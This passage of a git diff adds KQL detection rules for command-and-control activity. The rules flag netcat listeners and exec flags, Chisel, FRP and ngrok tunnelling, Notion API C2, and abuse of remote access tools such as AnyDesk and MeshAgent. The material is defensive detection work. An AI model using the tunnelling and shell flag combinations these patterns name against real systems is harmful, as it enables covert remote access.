Containers/") and FolderPath endswith "/osacompile" and InitiatingProcessFolderPath endswith "/bash") or ((ProcessCommandLine contains "LSUIElement" and ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Group Containers/") and FolderPath endswith "/plutil" and InitiatingProcessFolderPath endswith "/bash") or ((ProcessCommandLine contains "-r" and ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Group Containers/") and FolderPath endswith "/zip")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/potentially_suspicious_network_connection_to_notion_api.kql b/KQL/rules/Command and Control/potentially_suspicious_network_connection_to_notion_api.kql new file mode 100644 index 00000000..eb551610 --- /dev/null +++ b/KQL/rules/Command and Control/potentially_suspicious_network_connection_to_notion_api.kql @@ -0,0 +1,12 @@ +// Title: Potentially Suspicious Network Connection To Notion API +// Author: Gavin Knapp +// Date: 2023-05-03 +// Level: low +// Description: Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2" +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102 +// False Positives: +// - Legitimate applications communicating with the "api.notion.com" endpoint that are not already in the exclusion list. The desktop and browser applications do not appear to be using the API by default unless integrations are configured. + +DeviceNetworkEvents +| where RemoteUrl contains "api.notion.com" and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Notion\\Notion.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql b/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql new file mode 100644 index 00000000..23c68aef --- /dev/null +++ b/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql @@ -0,0 +1,12 @@ +// Title: Potentially Suspicious Usage Of Qemu +// Author: Muhammad Faisal (@faisalusuf), Hunter Juhan (@threatHNTR) +// Date: 2024-06-03 +// Level: medium +// Description: Detects potentially suspicious execution of the Qemu utility in a Windows environment. +Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090, attack.t1572 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-m 1M" or ProcessCommandLine contains "-m 2M" or ProcessCommandLine contains "-m 3M") and (ProcessCommandLine contains "restrict=off" and ProcessCommandLine contains "-netdev " and ProcessCommandLine contains "connect=" and ProcessCommandLine contains "-nographic")) and (not((ProcessCommandLine contains " -cdrom " or ProcessCommandLine contains " type=virt " or ProcessCommandLine contains " -blockdev "))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/printbrm_zip_creation_of_extraction.kql b/KQL/rules/Command and Control/printbrm_zip_creation_of_extraction.kql new file mode 100644 index 00000000..7b43f616 --- /dev/null +++ b/KQL/rules/Command and Control/printbrm_zip_creation_of_extraction.kql @@ -0,0 +1,10 @@ +// Title: PrintBrm ZIP Creation of Extraction +// Author: frack113 +// Date: 2022-05-02 +// Level: high +// Description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105, attack.defense-evasion, attack.t1564.004 + +DeviceProcessEvents +| where (ProcessCommandLine contains " -f" and ProcessCommandLine contains ".zip") and FolderPath endswith "\\PrintBrm.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/pua_3proxy_execution.kql b/KQL/rules/Command and Control/pua_3proxy_execution.kql new file mode 100644 index 00000000..94528c9e --- /dev/null +++ b/KQL/rules/Command and Control/pua_3proxy_execution.kql @@ -0,0 +1,12 @@ +// Title: PUA - 3Proxy Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-09-13 +// Level: high +// Description: Detects the use of 3proxy, a tiny free proxy server +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1572 +// False Positives: +// - Administrative activity + +DeviceProcessEvents +| where FolderPath endswith "\\3proxy.exe" or ProcessCommandLine contains ".exe -i127.0.0.1 -p" or ProcessVersionInfoFileDescription =~ "3proxy - tiny proxy server" \ No newline at end of file diff --git a/KQL/rules/Command and Control/pua_chisel_tunneling_tool_execution.kql b/KQL/rules/Command and Control/pua_chisel_tunneling_tool_execution.kql new file mode 100644 index 00000000..c9f1dbfa --- /dev/null +++ b/KQL/rules/Command and Control/pua_chisel_tunneling_tool_execution.kql @@ -0,0 +1,12 @@ +// Title: PUA - Chisel Tunneling Tool Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-09-13 +// Level: high +// Description: Detects usage of the Chisel tunneling tool via the commandline arguments +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090.001 +// False Positives: +// - Some false positives may occur with other tools with similar commandlines + +DeviceProcessEvents +| where FolderPath endswith "\\chisel.exe" or ((ProcessCommandLine contains "exe client " or ProcessCommandLine contains "exe server ") and (ProcessCommandLine contains "-socks5" or ProcessCommandLine contains "-reverse" or ProcessCommandLine contains " r:" or ProcessCommandLine contains ":127.0.0.1:" or ProcessCommandLine contains "-tls-skip-verify " or ProcessCommandLine contains ":socks")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/pua_fast_reverse_proxy_frp_execution.kql b/KQL/rules/Command and Control/pua_fast_reverse_proxy_frp_execution.kql new file mode 100644 index 00000000..a1db24c2 --- /dev/null +++ b/KQL/rules/Command and Control/pua_fast_reverse_proxy_frp_execution.kql @@ -0,0 +1,12 @@ +// Title: PUA - Fast Reverse Proxy (FRP) Execution +// Author: frack113, Florian Roth +// Date: 2022-09-02 +// Level: high +// Description: Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where ProcessCommandLine contains "\\frpc.ini" or (MD5 startswith "7D9C233B8C9E3F0EA290D2B84593C842" or SHA1 startswith "06DDC9280E1F1810677935A2477012960905942F" or SHA256 startswith "57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C") or (FolderPath endswith "\\frpc.exe" or FolderPath endswith "\\frps.exe") \ No newline at end of file diff --git a/KQL/rules/Command and Control/pua_iox_tunneling_tool_execution.kql b/KQL/rules/Command and Control/pua_iox_tunneling_tool_execution.kql new file mode 100644 index 00000000..9a56d33a --- /dev/null +++ b/KQL/rules/Command and Control/pua_iox_tunneling_tool_execution.kql @@ -0,0 +1,12 @@ +// Title: PUA- IOX Tunneling Tool Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-10-08 +// Level: high +// Description: Detects the use of IOX - a tool for port forwarding and intranet proxy purposes +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where FolderPath endswith "\\iox.exe" or (ProcessCommandLine contains ".exe fwd -l " or ProcessCommandLine contains ".exe fwd -r " or ProcessCommandLine contains ".exe proxy -l " or ProcessCommandLine contains ".exe proxy -r ") or (MD5 startswith "9DB2D314DD3F704A02051EF5EA210993" or SHA1 startswith "039130337E28A6623ECF9A0A3DA7D92C5964D8DD" or SHA256 startswith "C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731") \ No newline at end of file diff --git a/KQL/rules/Command and Control/pua_netcat_suspicious_execution.kql b/KQL/rules/Command and Control/pua_netcat_suspicious_execution.kql new file mode 100644 index 00000000..3b02ed3f --- /dev/null +++ b/KQL/rules/Command and Control/pua_netcat_suspicious_execution.kql @@ -0,0 +1,12 @@ +// Title: PUA - Netcat Suspicious Execution +// Author: frack113, Florian Roth (Nextron Systems) +// Date: 2021-07-21 +// Level: high +// Description: Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1095 +// False Positives: +// - Legitimate ncat use + +DeviceProcessEvents +| where (ProcessCommandLine contains " -lvp " or ProcessCommandLine contains " -lvnp" or ProcessCommandLine contains " -l -v -p " or ProcessCommandLine contains " -lv -p " or ProcessCommandLine contains " -l --proxy-type http " or ProcessCommandLine contains " -vnl --exec " or ProcessCommandLine contains " -vnl -e " or ProcessCommandLine contains " --lua-exec " or ProcessCommandLine contains " --sh-exec ") or (FolderPath endswith "\\nc.exe" or FolderPath endswith "\\ncat.exe" or FolderPath endswith "\\netcat.exe") \ No newline at end of file diff --git a/KQL/rules/Command and Control/pua_ngrok_execution.kql b/KQL/rules/Command and Control/pua_ngrok_execution.kql new file mode 100644 index 00000000..49f5032c --- /dev/null +++ b/KQL/rules/Command and Control/pua_ngrok_execution.kql @@ -0,0 +1,15 @@ +// Title: PUA - Ngrok Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2021-05-14 +// Level: high +// Description: Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available. +Involved domains are bin.equinox.io for download and *.ngrok.io for connections. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1572 +// False Positives: +// - Another tool that uses the command line switches of Ngrok +// - Ngrok http 3978 (https://learn.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0) + +DeviceProcessEvents +| where (ProcessCommandLine contains " tcp 139" or ProcessCommandLine contains " tcp 445" or ProcessCommandLine contains " tcp 3389" or ProcessCommandLine contains " tcp 5985" or ProcessCommandLine contains " tcp 5986") or (ProcessCommandLine contains " start " and ProcessCommandLine contains "--all" and ProcessCommandLine contains "--config" and ProcessCommandLine contains ".yml") or ((ProcessCommandLine contains " tcp " or ProcessCommandLine contains " http " or ProcessCommandLine contains " authtoken ") and FolderPath endswith "ngrok.exe") or (ProcessCommandLine contains ".exe authtoken " or ProcessCommandLine contains ".exe start --all") \ No newline at end of file diff --git a/KQL/rules/Command and Control/pua_nimgrab_execution.kql b/KQL/rules/Command and Control/pua_nimgrab_execution.kql new file mode 100644 index 00000000..796c423b --- /dev/null +++ b/KQL/rules/Command and Control/pua_nimgrab_execution.kql @@ -0,0 +1,12 @@ +// Title: PUA - Nimgrab Execution +// Author: frack113 +// Date: 2022-08-28 +// Level: high +// Description: Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Legitimate use of Nim on a developer systems + +DeviceProcessEvents +| where (MD5 startswith "2DD44C3C29D667F5C0EF5F9D7C7FFB8B" or SHA256 startswith "F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559") or FolderPath endswith "\\nimgrab.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/pua_nps_tunneling_tool_execution.kql b/KQL/rules/Command and Control/pua_nps_tunneling_tool_execution.kql new file mode 100644 index 00000000..3724f9df --- /dev/null +++ b/KQL/rules/Command and Control/pua_nps_tunneling_tool_execution.kql @@ -0,0 +1,12 @@ +// Title: PUA - NPS Tunneling Tool Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-10-08 +// Level: high +// Description: Detects the use of NPS, a port forwarding and intranet penetration proxy server +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where (ProcessCommandLine contains " -server=" and ProcessCommandLine contains " -vkey=" and ProcessCommandLine contains " -password=") or ProcessCommandLine contains " -config=npc" or (MD5 startswith "AE8ACF66BFE3A44148964048B826D005" or SHA1 startswith "CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181" or SHA256 startswith "5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856") or FolderPath endswith "\\npc.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/quickassist_execution.kql b/KQL/rules/Command and Control/quickassist_execution.kql new file mode 100644 index 00000000..3cc1f417 --- /dev/null +++ b/KQL/rules/Command and Control/quickassist_execution.kql @@ -0,0 +1,13 @@ +// Title: QuickAssist Execution +// Author: Muhammad Faisal (@faisalusuf) +// Date: 2024-12-19 +// Level: low +// Description: Detects the execution of Microsoft Quick Assist tool "QuickAssist.exe". This utility can be used by attackers to gain remote access. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use of Quick Assist in the environment. + +DeviceProcessEvents +| where FolderPath endswith "\\QuickAssist.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/rdp_over_reverse_ssh_tunnel.kql b/KQL/rules/Command and Control/rdp_over_reverse_ssh_tunnel.kql new file mode 100644 index 00000000..4fc16d9e --- /dev/null +++ b/KQL/rules/Command and Control/rdp_over_reverse_ssh_tunnel.kql @@ -0,0 +1,10 @@ +// Title: RDP Over Reverse SSH Tunnel +// Author: Samir Bousseaden +// Date: 2019-02-16 +// Level: high +// Description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389 +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001, car.2013-07-002 + +DeviceNetworkEvents +| where (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "::1/128")) and (InitiatingProcessFolderPath endswith "\\svchost.exe" and LocalPort == 3389) \ No newline at end of file diff --git a/KQL/rules/Command and Control/rdp_to_http_or_https_target_ports.kql b/KQL/rules/Command and Control/rdp_to_http_or_https_target_ports.kql new file mode 100644 index 00000000..bafdc6f3 --- /dev/null +++ b/KQL/rules/Command and Control/rdp_to_http_or_https_target_ports.kql @@ -0,0 +1,10 @@ +// Title: RDP to HTTP or HTTPS Target Ports +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-29 +// Level: high +// Description: Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443 +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001, car.2013-07-002 + +DeviceNetworkEvents +| where (RemotePort in~ ("80", "443")) and InitiatingProcessFolderPath endswith "\\svchost.exe" and LocalPort == 3389 \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql new file mode 100644 index 00000000..1d75ae98 --- /dev/null +++ b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql @@ -0,0 +1,15 @@ +// Title: Remote Access Tool - AnyDesk Execution +// Author: frack113 +// Date: 2022-02-11 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where (FolderPath endswith "\\AnyDesk.exe" or FolderPath endswith "\\AnyDeskMSI.exe") or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH" \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql new file mode 100644 index 00000000..a8ad8d6d --- /dev/null +++ b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql @@ -0,0 +1,15 @@ +// Title: Remote Access Tool - Anydesk Execution From Suspicious Folder +// Author: Florian Roth (Nextron Systems) +// Date: 2022-05-20 +// Level: high +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use of AnyDesk from a non-standard folder + +DeviceProcessEvents +| where ((FolderPath endswith "\\AnyDesk.exe" or FolderPath endswith "\\AnyDeskMSI.exe") or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH") and (not((FolderPath contains "\\AppData\\" or FolderPath contains "Program Files (x86)\\AnyDesk" or FolderPath contains "Program Files\\AnyDesk"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_piped_password_via_cli.kql b/KQL/rules/Command and Control/remote_access_tool_anydesk_piped_password_via_cli.kql new file mode 100644 index 00000000..88180709 --- /dev/null +++ b/KQL/rules/Command and Control/remote_access_tool_anydesk_piped_password_via_cli.kql @@ -0,0 +1,13 @@ +// Title: Remote Access Tool - AnyDesk Piped Password Via CLI +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-28 +// Level: medium +// Description: Detects piping the password to an anydesk instance via CMD and the '--set-password' flag. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate piping of the password to anydesk +// - Some FP could occur with similar tools that uses the same command line '--set-password' + +DeviceProcessEvents +| where ProcessCommandLine contains "/c " and ProcessCommandLine contains "echo " and ProcessCommandLine contains ".exe --set-password" \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_silent_installation.kql b/KQL/rules/Command and Control/remote_access_tool_anydesk_silent_installation.kql new file mode 100644 index 00000000..ad374038 --- /dev/null +++ b/KQL/rules/Command and Control/remote_access_tool_anydesk_silent_installation.kql @@ -0,0 +1,12 @@ +// Title: Remote Access Tool - AnyDesk Silent Installation +// Author: Ján Trenčanský +// Date: 2021-08-06 +// Level: high +// Description: Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate deployment of AnyDesk + +DeviceProcessEvents +| where ProcessCommandLine contains "--install" and ProcessCommandLine contains "--start-with-win" and ProcessCommandLine contains "--silent" \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql b/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql new file mode 100644 index 00000000..2bfbcc78 --- /dev/null +++ b/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql @@ -0,0 +1,15 @@ +// Title: Remote Access Tool - GoToAssist Execution +// Author: frack113 +// Date: 2022-02-13 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where ProcessVersionInfoFileDescription =~ "GoTo Opener" or ProcessVersionInfoProductName =~ "GoTo Opener" or ProcessVersionInfoCompanyName =~ "LogMeIn, Inc." \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql b/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql new file mode 100644 index 00000000..82465ebb --- /dev/null +++ b/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql @@ -0,0 +1,15 @@ +// Title: Remote Access Tool - LogMeIn Execution +// Author: frack113 +// Date: 2022-02-11 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where ProcessVersionInfoFileDescription =~ "LMIGuardianSvc" or ProcessVersionInfoProductName =~ "LMIGuardianSvc" or ProcessVersionInfoCompanyName =~ "LogMeIn, Inc." \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql b/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql new file mode 100644 index 00000000..a761d102 --- /dev/null +++ b/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql @@ -0,0 +1,14 @@ +// Title: Remote Access Tool - MeshAgent Command Execution via MeshCentral +// Author: @Kostastsale +// Date: 2024-09-22 +// Level: medium +// Description: Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly. +MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - False positives can be found in environments using MeshAgent for remote management, analysis should prioritize the grandparent process, MeshAgent.exe, and scrutinize the resulting child processes triggered by any suspicious interactive commands directed at the target host. + +DeviceProcessEvents +| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\meshagent.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql b/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql new file mode 100644 index 00000000..b361e753 --- /dev/null +++ b/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql @@ -0,0 +1,15 @@ +// Title: Remote Access Tool - NetSupport Execution +// Author: frack113 +// Date: 2022-09-25 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where ProcessVersionInfoFileDescription =~ "NetSupport Client Configurator" or ProcessVersionInfoProductName =~ "NetSupport Remote Control" or ProcessVersionInfoCompanyName =~ "NetSupport Ltd" or ProcessVersionInfoOriginalFileName =~ "PCICFGUI.EXE" \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql new file mode 100644 index 00000000..fb076c21 --- /dev/null +++ b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql @@ -0,0 +1,15 @@ +// Title: Remote Access Tool - Potential MeshAgent Execution - MacOS +// Author: Norbert Jaśniewicz (AlphaSOC) +// Date: 2025-05-19 +// Level: medium +// Description: Detects potential execution of MeshAgent which is a tool used for remote access. +Historical data shows that threat actors rename MeshAgent binary to evade detection. +Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Environments that legitimately use MeshAgent + +DeviceProcessEvents +| where ProcessCommandLine contains "--meshServiceName" \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql new file mode 100644 index 00000000..1f6df197 --- /dev/null +++ b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql @@ -0,0 +1,15 @@ +// Title: Remote Access Tool - Potential MeshAgent Execution - Windows +// Author: Norbert Jaśniewicz (AlphaSOC) +// Date: 2025-05-19 +// Level: medium +// Description: Detects potential execution of MeshAgent which is a tool used for remote access. +Historical data shows that threat actors rename MeshAgent binary to evade detection. +Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Environments that legitimately use MeshAgent + +DeviceProcessEvents +| where ProcessCommandLine contains "--meshServiceName" \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql new file mode 100644 index 00000000..81fbccc5 --- /dev/null +++ b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql @@ -0,0 +1,13 @@ +// Title: Remote Access Tool - Renamed MeshAgent Execution - MacOS +// Author: Norbert Jaśniewicz (AlphaSOC) +// Date: 2025-05-19 +// Level: high +// Description: Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent. +RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management. +However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.defense-evasion, attack.t1219.002, attack.t1036.003 + +DeviceProcessEvents +| where (ProcessCommandLine contains "--meshServiceName" or ProcessVersionInfoOriginalFileName contains "meshagent") and (not((FolderPath endswith "/meshagent" or FolderPath endswith "/meshagent_osx64"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql new file mode 100644 index 00000000..c6254295 --- /dev/null +++ b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql @@ -0,0 +1,13 @@ +// Title: Remote Access Tool - Renamed MeshAgent Execution - Windows +// Author: Norbert Jaśniewicz (AlphaSOC) +// Date: 2025-05-19 +// Level: high +// Description: Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent. +RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management. +However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.defense-evasion, attack.t1219.002, attack.t1036.003 + +DeviceProcessEvents +| where (ProcessCommandLine contains "--meshServiceName" or ProcessVersionInfoOriginalFileName contains "meshagent") and (not(FolderPath endswith "\\meshagent.exe")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql b/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql new file mode 100644 index 00000000..0a95d2e4 --- /dev/null +++ b/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql @@ -0,0 +1,15 @@ +// Title: Remote Access Tool - ScreenConnect Execution +// Author: frack113 +// Date: 2022-02-13 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate usage of the tool + +DeviceProcessEvents +| where ProcessVersionInfoFileDescription =~ "ScreenConnect Service" or ProcessVersionInfoProductName =~ "ScreenConnect" or ProcessVersionInfoCompanyName =~ "ScreenConnect Software" \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql b/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql new file mode 100644 index 00000000..28c1bf37 --- 